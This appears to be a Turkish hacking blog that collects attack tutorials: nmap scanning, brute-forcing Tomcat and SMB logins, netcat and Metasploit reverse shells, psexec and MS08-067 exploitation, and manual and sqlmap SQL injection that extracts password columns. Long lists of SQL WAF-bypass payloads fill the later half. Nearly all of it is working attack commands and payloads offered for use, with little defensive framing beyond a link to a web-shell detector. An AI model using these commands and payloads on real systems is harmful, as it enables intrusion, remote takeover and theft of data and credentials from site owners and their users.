28 Temmuz 2021 Çarşamba

Nmap Kullanım Komutları



nmap -sC -sV -oA nmap/initial -vvv ipadresi

nmap -sC -sS -sV ipadresi

nmap -sC -sV -oA cıktı.txt ipadresi

sudo nmap -sS -sV -sC -n -v -p 21,53,80,139,445,1001,1900  192.168.1.169

-sn: Port taraması yapma anlamına gelir.

-n: DNS Çözümlemesi yapma anlamına gelir.

-v, -vv, -vvv: Ekrana gösterilecek detayları arttırır.

-F: Daha hızlı tarama yapar. Daha az sonuç bulur.

-sS:Syn Taraması Yapar

--reason: Bulduğu bir sonucun sebebini gösterir.

--open: Sadece açık Portları gösterir.

-p-: Bir IP üzerinde bulunması muhteme 65535 portun hepsini tarar.

-sV: Açık portta çalışan servisin ne olduğunu bulmaya çalışır. -sC ile birlikte kullanılırsa işe yarar.

-sC: -sV ile versiyon tespiti yapılırken nmap scriptlerini kullanır.

-p: Sadece bu parametreden sonra belirtilen portları tarar.

(www.sechunterz.pw)benim kullandığım nmap komutu: nmap -sV -sC -vv -Pn -T4 yourserver  

😁

Web Shell Detector



 FTP dosyalarınızın içinde php shell olduğundan şüphe ediyorsunuz ? 

ancak bunu manuel olarak bulmanın imkanı neredeyse imkansız ve yorucu, 

ayrıca zaman alan birşey. Bu paylaşacağımız php dosyasını FTP ana dizine yükleyiniz ve çalıştırın,

FTP de ne var yok tüm zararlıları tespit edip size bildirecektir, 

size ise bu shelleri silmek düşer okadar basit.(www.sechunterz.pw)


https://github.com/emposha/PHP-Shell-Detector

Tomcat 8080-8180 Port Saldırısı



Tomcat 8080/8180 portunda çalışan TCP bazlı bir servisdir.Tomcat saldırıları genelde küçük wordlistlerle 

gerçekleştirilir.Çünkü Tomcat servisi 15-20 giriş denemesinden sonra kendini 3-5 dakika arası kitler.

Bu yüzden Tomcat servisine manuel kaba kuvvet saldırısı yapmak en mantıklısıdır. Tomcat servisine tarayıcı üzerinden erişilir.

Herhangi bir yol ile Tomcat giriş bilgilerine eriştiğimiz bir sisteme .jsp uzantılı dosyalar yüklenebilir.

Bu dosyalar ile uzaktan kod yürütme işlemi gerçekleştirilebilir.

Bu dosyalara Github’dan rahatlıkla erişim sağlayabilirsiniz.

Bir örnek vermek gerekirse Uzaktan Kod Yürütme ile kendimize bir Netcat Shell bağlantısı alabiliriz. 

Örnek Komutlar Aşağıdaki Gibidir: 

Kali Linux’da terminali açıp şu komutu gireriz: 

nc -l -v -p 4444 Uzaktaki komut satırımıza da şu komutu veriyoruz: 

nc -e bin/bash “ip adresi” 4444 Ve böylelikle hedefin komut satırında istediğimiz komutları çalıştırabiliriz.(www.sechunterz.pw)

SMB(microsoft-ds) SALDIRILARI

 SMB servisi 445.port üzerinde çalışan TCP bazlı bir servistir.Bugün anlatacağımız saldırı yöntemi bu servis üzerine brute force yapılmasıdır.Önümüzdeki makalelerde bu servise yönelik daha üst düzey saldırıları anlatacağız.


Brute force saldırısını msfconsole üzerinden auxilary ile gerçekleştireceğiz.


use auxilary/scanner/smb/smb_login yazarak auxilarye geçiş yapıyoruz.


show options diyerek auxilary’nin bizden ne istediğini görüyoruz ve set komutu ile dolduruyoruz. Sistemde bildiğimiz bir SMBUSER yoksa Administrator olarak saldırımızı gerçekleştirebiliriz.


set pass_file “wordlist yolu”


set STOP_ON_SUCCESS true yazarak doğru loginleri bulduğunda saldırının durmasını sağlıyoruz.


run diyerek saldırıyı başlatıyoruz.


Saldırının başarılı gerçekleştiğini varsayarak devam ediyoruz.”winexe aracını kullanarak bu servise bağlantı sağlayabiliriz.



winexe –user=Administrator%şifre //hedef sistem ip adresi ‘erişmek istediğimiz komut satırı(cmd)’


Bu şekilde hedef sisteme bağlantı sağlayabiliriz.Aynı işlemi msfconsole üzerinden de gerçekleştirebiliriz.


use exploit/windows/smb/psexec


show options diyerek istenenleri dolduruyoruz (set komutu ile)


set payload payload windows/shell/reverse_tcp yazarak sisteme payload atıyoruz.


show options diyerek payloadın bizden istediklerini dolduruyoruz.


run diyerek işlemi başlatıyoruz ve komut satırına erişim sağlıyoruz.


Eğer sistemde oturum açılmaz ise bunun nedeni payloadın mimarisinden kaynaklanıyor olabilir. x32 veyahut x64 payload bir payload vererek aynı işlemleri gerçekleştirip devam edebilirsiniz


SMB Sign Özelliğinden Faydalanmak:



SMB_SİGN özelliği mesaj bloklarında görülen bir imza özelliğidir.Özelliğin sistem yöneticisi tarafından açılmaması durumunda çeşitli(www.sechunterz.pw)yönlendirmelerle hedef sistemde Man İn The Middle(Ortadaki Adam) gerçekleştirilebilir.


Sistemde bu özelliğin aktif olup olmadığını “Runfinger” adlı tool ile öğrenebiliriz.


usr/share/responder/tools/Runfinger.py -i hedef ip adresi


Bu toolun çalışma mantığı şöyledir:


Bir ip adresi verilir ve bu tool sistemde çalışan tüm cihazların SİGN özelliğini kontrol eder.Cihazların SİGN özelliği FALSE ise yapacağımız saldırı olumlu sonuç verecektir.Bu saldırıyı önümüzdeki makalelerde detaylı şekilde anlatacağız.

Mail Atıp Site Açık Bildirmek İçin İzlenmesi Gereken Yollar




 

Bir açığı mail atıcaksanız izlemeniz gereken yollar


1 - Açık türünü yazın


- açık türünden bir senaryo yazın

Örenk sql ise veri çekilme xss ise pshing )


3- açığın nasıl kapayacaklarını yazın


4 - btc cüzdan koyun destek için btc ata bilirsiniz gibi


Chp sitesini subunda bulunan xss açığını bildirdim karşılığında 4$ gibi bir para aldım


www.sechunterz.pw

27 Temmuz 2021 Salı

POST SQL Injection




SQLMAP POST İNJECTION


Bir login ya da her hangi bir post edilebilecek yerde bulunan sql Injection zafiyetlerini tespit ve bunları exploit etmek için --data parametresiyle POST isteği yapıcaz.


sqlmap.py -u "http://test.com/test.php?test=login" --data="loginname=admin&loginpass=admin&duration=mins30" -p "loginname" --dbms="MySQL"

--forms komutu post bilgisini otomatik olarak çekmektedir.


POST bilgisini, hangi parametrenin test edileceğini (-p) ve DBMS bilgisini (--dbms) girdik.


Örnek İşe Yarar Videolar


https://www.youtube.com/watch?v=1gmhtzimPHo



https://www.youtube.com/watch?v=7PrUX2587A0



https://www.youtube.com/watch?v=1Qs195_8hNw


İşe Yarar Web Scanner Araçları


Acunetix

Net Sparker

Nessus

Openvas

Kör Sql Injection (Blind)


 

Kör Sql Injection Nedir? (Blind)


1=0 1=2 4=3 gibi eşitlik olmayan değerler verildiğinde sitenin verdiği hata ya da sayfadaki değişmelere dayanarak işleme devam eder.

Örnek url www.test.com/test.php?id=1'and 1=2

Bu url 1=2 şeklinde bir eşitlik false olduğundan hata verecek ya da sayfadaki değişimler sonucunda bilği vercek verecektir.


Manuel Yapımı

Kolon Sayısı Tespiti


Kolon Sayısını Bulurken Sayfa Değişkliğini Kullanacağız. And "1=1" Order+By Order+By+1 Sondaki Sayıyı +1 Şeklinde Birer Birer(www.sechunterz.pw)Artırıyoruz Sayfa Değişinceye Kadar.Burada Kolon Sayısını Hangi Sayıda Sayfa Değiştiğinden Anlayacağız.

www.test.com/test.php?id=1+and+1=1+order+by+1


Sorgu Oluşturma


Burada 1=1 Eşitlik Yerine 1=0 Eşitsizliği Kullanacaz.1=0' sonra "union+select+0,1,2,3" Yazıyoruz.2 Numarayı Kullanacağız


www.test.com/test.php?id=1+and+1=0+union+select+0,1,2,3


Tablo Çekimi


Tablo Çekimi İçin 2 Numaralı Kolon Sayısını Kullancaz


www.test.com/test.php?id=1+and+1=1+union+select+0,1,group_concat(table_name),3+from+test_db.tables


Tablo Veri Çekimi


Normal Sql Gibi Bunuda Öyle Yapacağız Ama Tablo Adını Hexleme Yapmamız Gerektir Ben Örnek Olarak securityTablosunu Çekcem Ve Bunun Hex(www.sechunterz.pw)Değerine Bakalım "68616b616e6e" Burdan Rahatca Bakabilirsiniz


www.test.com/test.php?id=1+and+1=1+union+select+0,1,group_concat(column_name),3+from+test_db.columns+where+table_name='68616b616e6e'


Kolon Veri Çekimi


security Tablosundan Tel Ve Şifre Kolonları Çıktı. Tel Ve Şifre Kolonlarının Değerlerini Öğrenelim.(www.sechunterz.pw)Veriler Karışmasın Diye Kolonlar Arasında "0x3a" Kodunu Ekliyoruz.


www.test.com/test.php?id=1+and+1=1+union+select+0,1,concat(Tel,0x3a,Şifre),3+from+security


www.sechunterz.pw

SQL Web Uygulama G.Duvar_ GroupConcat Atlatma

 


SQL Web Uygulama G.Duvarı GroupConcat Atlatma 


SQL Web Uygulama Güvenlik Duvarı GroupConcat Bypass Atlatma Örnekleri


SQL Waf Group_Concat Bypass Örnekleri


Group_Concat

   group_concat()

   /*!group_concat*/()

   grOUp_ConCat(/*!*/,0x3e,/*!*/)

   group_concat(,0x3c62723e)

   g%72oup_c%6Fncat%28%76%65rsion%28%29,%22testtest%22%29

   CoNcAt()

   CONCAT(DISTINCT Version())

   concat(,0x3a,)

   concat%00()

   %00CoNcAt()

   /*!50000cOnCat*/(/*!Version()*/)

   /*!50000cOnCat*/

   /**//*!12345cOnCat*/(,0x3a,)

   concat_ws()

   concat(0x3a,,0x3c62723e)

   /*!concat_ws(0x3a,)*/

   concat_ws(0x3a3a3a,version()

   CONCAT_WS(CHAR(32,58,32),version(),)

[~] group_concat() [~]

/*!group_concat*/()

gRoUp_cOnCAt()

group_concat(/*!*/)

group_concat(/*!12345table_name*/)

group_concat(/*!50000table_name*/)

/*!group_concat*/(/*!12345table_name*/)

/*!group_concat*/(/*!50000table_name*/)

/*!12345group_concat*/(/*!12345table_name*/)

/*!50000group_concat*/(/*!50000table_name*/)

/*!GrOuP_ConCaT*/()

/*!12345GroUP_ConCat*/()

/*!50000gRouP_cOnCaT*/()

/*!50000Gr%6fuP_c%6fnCAT*/()

unhex(hex(group_concat(table_name)))

unhex(hex(/*!group_concat*/(/*!table_name*/)))

unhex(hex(/*!12345group_concat*/(table_name)))

unhex(hex(/*!12345group_concat*/(/*!table_name*/)))

unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))

unhex(hex(/*!50000group_concat*/(table_name)))

unhex(hex(/*!50000group_concat*/(/*!table_name*/)))

unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))

convert(group_concat(table_name)+using+ascii)

convert(group_concat(/*!table_name*/)+using+ascii)

convert(group_concat(/*!12345table_name*/)+using+ascii)

convert(group_concat(/*!50000table_name*/)+using+ascii)

CONVERT(group_concat(table_name)+USING+latin1)

CONVERT(group_concat(table_name)+USING+latin2)

CONVERT(group_concat(table_name)+USING+latin3)

CONVERT(group_concat(table_name)+USING+latin4)

CONVERT(group_concat(table_name)+USING+latin5)

Group_Concat

group_concat ()

/*!group_concat*/ ()

grOUp_ConCat ( /*!*/ , 0x3e , /*!*/ )

group_concat (, 0x3c62723e )

g % 72oup_c % 6Fncat % 28 % 76% 65rsion

% 28 %29 ,% 22 ~ BlackRose% 22 %29

CoNcAt ()

CONCAT (DISTINCT Version ())

concat (, 0x3a ,)

concat %00 ()

% 00CoNcAt ()

/*!50000cOnCat*/ ( /*!Version()*/ )

/*!50000cOnCat*/

/**//*!12345cOnCat*/ (, 0x3a ,)

concat_ws ()

concat (0x3a ,, 0x3c62723e )

/*!concat_ws(0x3a,)*/

concat_ws ( 0x3a3a3a , version()

CONCAT_WS ( CHAR ( 32, 58, 32 ), version

(),)

REVERSE( tacnoc )

binary (version ())

uncompress (compress ( version()))

aes_decrypt ( aes_encrypt ( version

(), 1), 1 )[/ b ][/ u ][/ size ]


[~] after id no. like id=1 +/*!and*/+1=0 [~]

+div+0

Having+1=0

+AND+1=0

+/*!and*/+1=0

and(1)=(0)


---


HATA KAYNAKLI GROUP CONCAT ATLATMA

=21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1–

--

VERİTABANI GROUP CONCAT ATLATMA

21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

--

TABLO İSİMLERİ GROUP CONCAT ATLATMA

and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

--

KOLON SAYILARI GROUP CONCAT ATLATMA

21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

SQL WAF Atlatma UnionSelect OrderBy Bilgi Tablosu



SQL Waf UnionSelect Bypass Teknikleri ve Örnekleri

SQL WAF Atlatma UnionSelect OrderBy Bilgi Tablosu


Best Bypass WAF Methods


_____________________________________________________________________

SQL ORDER BY Bypass Teknikleri [ Örnekler ]


[~] order by [~]

/**/ORDER/**/BY/**/

/*!order*/+/*!by*/

/*!ORDER BY*/

/*!50000ORDER BY*/

/*!50000ORDER*//**//*!50000BY*/

/*!12345ORDER*/+/*!BY*/

_____________________________________________________________________

SQL Union Select Bypass Yöntem ve Teknikleri [ Örnekler ]


[~] UNION select [~]

/*!00000Union*/ /*!00000Select*/

/*!50000%55nIoN*/ /*!50000%53eLeCt*/

%55nion %53elect

%55nion(%53elect 1,2,3)-- -

+union+distinct+select+

+union+distinctROW+select+

/**//*!12345UNION SELECT*//**/

/**//*!50000UNION SELECT*//**/

/**/UNION/**//*!50000SELECT*//**/

/*!50000UniON SeLeCt*/

union /*!50000%53elect*/

+ #?uNiOn + #?sEleCt

+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt

/*!%55NiOn*/ /*!%53eLEct*/

/*!u%6eion*/ /*!se%6cect*/

+un/**/ion+se/**/lect

uni%0bon+se%0blect

%2f**%2funion%2f**%2fselect

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A

REVERSE(noinu)+REVERSE(tceles)

/*--*/union/*--*/select/*--*/

union (/*!/**/ SeleCT */ 1,2,3)

/*!union*/+/*!select*/

union+/*!select*/

/**/union/**/select/**/

/**/uNIon/**/sEleCt/**/

+%2F**/+Union/*!select*/

/**//*!union*//**//*!select*//**/

/*!uNIOn*/ /*!SelECt*/

+union+distinct+select+

+union+distinctROW+select+

uNiOn aLl sElEcT

UNIunionON+SELselectECT

/**/union/*!50000select*//**/

0%a0union%a0select%09

%0Aunion%0Aselect%0A

%55nion/**/%53elect

uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/

%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/

%0A%09UNION%0CSELECT%10NULL%

/*!union*//*--*//*!all*//*--*//*!select*/

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C

/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/

+UnIoN/*&a=*/SeLeCT/*&a=*/

union+sel%0bect

+uni*on+sel*ect+

+#1q%0Aunion all#qa%0A#%0Aselect

union(select (1),(2),(3),(4),(5))

UNION(SELECT(column)FROM(table))

%23xyz%0AUnIOn%23xyz%0ASeLecT+

%23xyz%0A%55nIOn%23xyz%0A%53eLecT+

union(select(1),2,3)

union (select 1111,2222,3333)

uNioN (/*!/**/ SeleCT */ 11)

union (select 1111,2222,3333)

+#1q%0AuNiOn all#qa%0A#%0AsEleCt

/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/

%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/

+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+

+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C

/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/

+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+

/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/

/union\sselect/g

/union\s+select/i

/*!UnIoN*/SeLeCT

+UnIoN/*&a=*/SeLeCT/*&a=*/

+uni>on+sel>ect+

+(UnIoN)+(SelECT)+

+(UnI)(oN)+(SeL)(EcT)

+’UnI”On’+'SeL”ECT’

+uni on+sel ect+

+/*!UnIoN*/+/*!SeLeCt*/+

/*!u%6eion*/ /*!se%6cect*/

uni%20union%20/*!select*/%20

union%23aa%0Aselect

/**/union/*!50000select*/

/^.*union.*$/ /^.*select.*$/

/*union*/union/*select*/select+

/*uni X on*/union/*sel X ect*/

+un/**/ion+sel/**/ect+

+UnIOn%0d%0aSeleCt%0d%0a

UNION/*&test=1*/SELECT/*&pwn=2*/

un?+un/**/ion+se/**/lect+

+UNunionION+SEselectLECT+

+uni%0bon+se%0blect+

%252f%252a*/union%252f%252a /select%252f%252a*/

/%2A%2A/union/%2A%2A/select/%2A%2A/

%2f**%2funion%2f**%2fselect%2f**%2f

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A

/*!UnIoN*/SeLecT+


[~] More Union Select [~]


[+] Union Select:


union /*!select*/+

union/**/select/**/

/**/union/**/select/**/

/**/union/*!50000select*/

/**//*!12345UNION SELECT*//**/

/**//*!50000UNION SELECT*//**/

/**/uniUNIONon/**/selSELECTect/**/

/**/uniUNIONon/**/aALLll/**/selSELECTect/**/

/**//*!union*//**//*!select*//**/

/**/UNunionION/**/SELselectECT/**/

/**//*UnIOn*//**//*SEleCt*//**/

/**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/

/**/UNunionION/**/all/**/SELselectECT/**/

/**//*UnIOn*//**/all/**//*SEleCt*//**/

/**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/

uni

%20union%20/*!select*/%20

union%23aa%0Aselect

union+distinct+select+

union+distinctROW+select+

/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/

%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/

%23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+

/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+

/*!u%6eion*/+/*!se%6cect*/+

1%’)and(0)union(select(1),version(),3,4,5,6)%23%23%23

/*!50000%55nIoN*/+/*!50000%53eLeCt*/

union /*!50000%53elect*/

+%2F**/+Union/*!select*/

%55nion %53elect

+–+Union+–+Select+–+

+UnIoN/*&a=*/SeLeCT/*&a=*/

uNiOn aLl sElEcT

uUNIONnion all sSELECTelect

union(select(1),2,3)

union (select 1111,2222,3333)

union (/*!/**/ SeleCT */ 11)

%0A%09UNION%0CSELECT%10NULL%

/*!union*//*–*//*!all*//*–*//*!select*/

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C

union+sel%0bect

+uni*on+sel*ect+

+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a

union(select (1),(2),(3),(4),(5))

UNION(SELECT(column)FROM(table))

id=1+’UnI”On’+’SeL”ECT’

id=1+’UnI’||’on’+SeLeCT’

union select 1–+%0A,2–+%0A,3–+%0A etc

_____________________________________________________________________

SQL Bilgi Şeması Tabloları WAF Bypass


[~] information_schema.tables [~]

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -

/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table

/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table

_____________________________________________________________________

MS08-067 ZAFİYETİ VE SÖMÜRÜLMESİ



Genelde 2000li windows Serverlarda ve xp makinalarda bulunur.SMB üzerine yazılmış bir exploittir.


Bu zafiyeti tespit etmek için sistem üzerine bilindik bir nmap taraması yapabiliriz.Fakat ben size nmap scriptini kullanarak tarama yapmasını göstereceğim.


usr/share/nmap/scripts/


-ls | grap “ms08”


karşımıza çıkan scripti kopyalıyoruz ve


nmap –scripts script adı ip adresi -p445 ile(www.sechunterz.pw)sistemde tarama yaptırıyoruz ve zafiyetin olduğunu gözlemliyoruz.


daha sonra msfconsole’dan


use exploit/windows/smb/ms08_067_netapi


set rhost ile rhost u giriyoruz.


set payload windows/shell/reverse_tcp


set LHOST ile LHOST’u giriyoruz ve


run diyerek exploiti başlatıyoruz.